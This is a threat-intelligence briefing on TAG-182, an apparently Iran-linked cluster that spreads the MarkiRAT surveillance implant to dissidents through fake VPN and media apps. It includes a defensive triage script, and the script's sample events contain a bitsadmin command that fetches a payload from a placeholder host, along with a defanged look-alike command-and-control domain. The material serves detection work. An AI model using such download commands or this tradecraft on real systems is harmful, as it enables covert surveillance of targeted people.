Iran ramps up dissident surveillance with fake VPN and media apps

Iran's security services are leaning harder on digital surveillance now that the summer's fighting with Israel and the United States has cooled, and researchers say a threat cluster tracked as TAG-182 is a growing part of that effort. Recorded Future's Insikt Group has uncovered fresh infrastructure the group uses to spread MarkiRAT, a Windows surveillance implant aimed at Iranians at home and abroad.

Who is being targeted

According to the Insikt Group report, TAG-182 lures victims with fake VPN and media-player apps promoted through social media, including Instagram. The bogus tools carry names like "Pis2ray VPN" and "YESHICA YEPlayer," none of which are legitimate listings on Google Play or Apple's App Store. The targeting fits Tehran's playbook of monitoring perceived dissidents and alleged foreign collaborators, and Recorded Future assesses this activity is highly likely to intensify following the partial restoration of internet access in Iran on May 26, 2026.

The link to Ferocious Kitten

MarkiRAT is not new. It has long been tied to Ferocious Kitten, an Iran-nexus group known for spying on activists and human-rights advocates inside the country. The new samples share distinctive tradecraft with those older ones, notably the abuse of the Background Intelligent Transfer Service (bitsadmin) to fetch payloads, which suggests a credible relationship between TAG-182 and Ferocious Kitten. Recorded Future stops short of saying the two are organizationally the same, noting more evidence is needed. It is the latest in a long line of Iranian personal-data harvesting operations built for surveillance rather than sabotage.

How the attack works

Victims who install a lure such as YEPlayer trigger a download of YEPlayer.rar from attacker infrastructure, which keeps serving the payload even when the page shows an error, a sign of deliberate staging. Once YEPlayer.exe runs, MarkiRAT beacons out with a multipart upload to a look-alike Microsoft-themed domain (for example microsotf[.]comi-site[.]website) and drops a file named svehost.exe that impersonates the legitimate Windows svchost.exe. The group favors Let's Encrypt certificates and domains that mimic Microsoft, Google, and social-media brands.
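To give defenders something concrete to hunt with, here is an added triage script (not code from the Insikt Group report or from Recorded Future) that checks the tradecraft just described against constructed Sysmon-style events: a near-miss of svchost.exe such as svehost.exe, bitsadmin transfers from a remote URL, and multipart POSTs to brand-mimicking domains. The event schema and the example[.]invalid download URL are assumptions made for the sample.

```python
import re
from difflib import SequenceMatcher
from typing import Optional

BRANDS = ("microsoft", "google", "instagram")              # brands the group mimics
CORE_BINARIES = ("svchost.exe", "lsass.exe", "csrss.exe")  # names worth impersonating
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def lookalike_binary(image: str) -> Optional[str]:
    """Near-miss of a core Windows file name, or the genuine name run from a user path."""
    path = image.lower().replace("/", "\\")
    name = path.rsplit("\\", 1)[-1]
    for real in CORE_BINARIES:
        if name == real and not path.startswith(SYSTEM_DIRS):
            return f"{real} running outside the system directories"
        if name != real and SequenceMatcher(None, name, real).ratio() >= 0.8:
            return f"{name} mimics {real}"
    return None

def mimics_brand(host: str) -> Optional[str]:
    """Domain label that approximates a brand without matching it; accepts defanged [.] hosts."""
    for label in re.split(r"[.\[\]]+", host.lower()):
        for brand in BRANDS:
            if label != brand and SequenceMatcher(None, label, brand).ratio() >= 0.8:
                return f"{label} mimics {brand}"
    return None

def triage(events: list) -> list:
    """Return (event_id, reason) pairs for events matching the reported tradecraft."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            cmd = ev.get("cmdline", "").lower()
            if "bitsadmin" in cmd and "/transfer" in cmd and "http" in cmd:
                hits.append((ev["id"], "bitsadmin fetching a remote payload"))
            reason = lookalike_binary(ev["image"])
            if reason:
                hits.append((ev["id"], reason))
        elif ev["type"] == "network" and ev["method"] == "POST" and "multipart" in ev.get("content_type", ""):
            reason = mimics_brand(ev["host"])
            if reason:
                hits.append((ev["id"], f"multipart beacon: {reason}"))
    return hits

SAMPLE_EVENTS = [  # constructed Sysmon-style records, not data from the report
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"id": 2, "type": "process", "image": r"C:\Users\u\AppData\Roaming\svehost.exe", "cmdline": "svehost.exe"},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe", "cmdline": "bitsadmin /transfer job /download http://example[.]invalid/YEPlayer.rar C:\\Users\\u\\YEPlayer.rar"},
    {"id": 4, "type": "network", "host": "microsotf[.]comi-site[.]website", "method": "POST", "content_type": "multipart/form-data"},
]
```

Only event 1, the genuine svchost.exe in System32, passes clean; a genuine svchost.exe launched from a user directory would be flagged as well.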

Indicators of compromise

Farsi-speaking users, especially in the diaspora, should avoid VPN and media apps shared through social-media links or unofficial sites, and defenders serving these communities should watch for the domains and hashes published in the full report.

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.

Read the full analysis on IntelFusions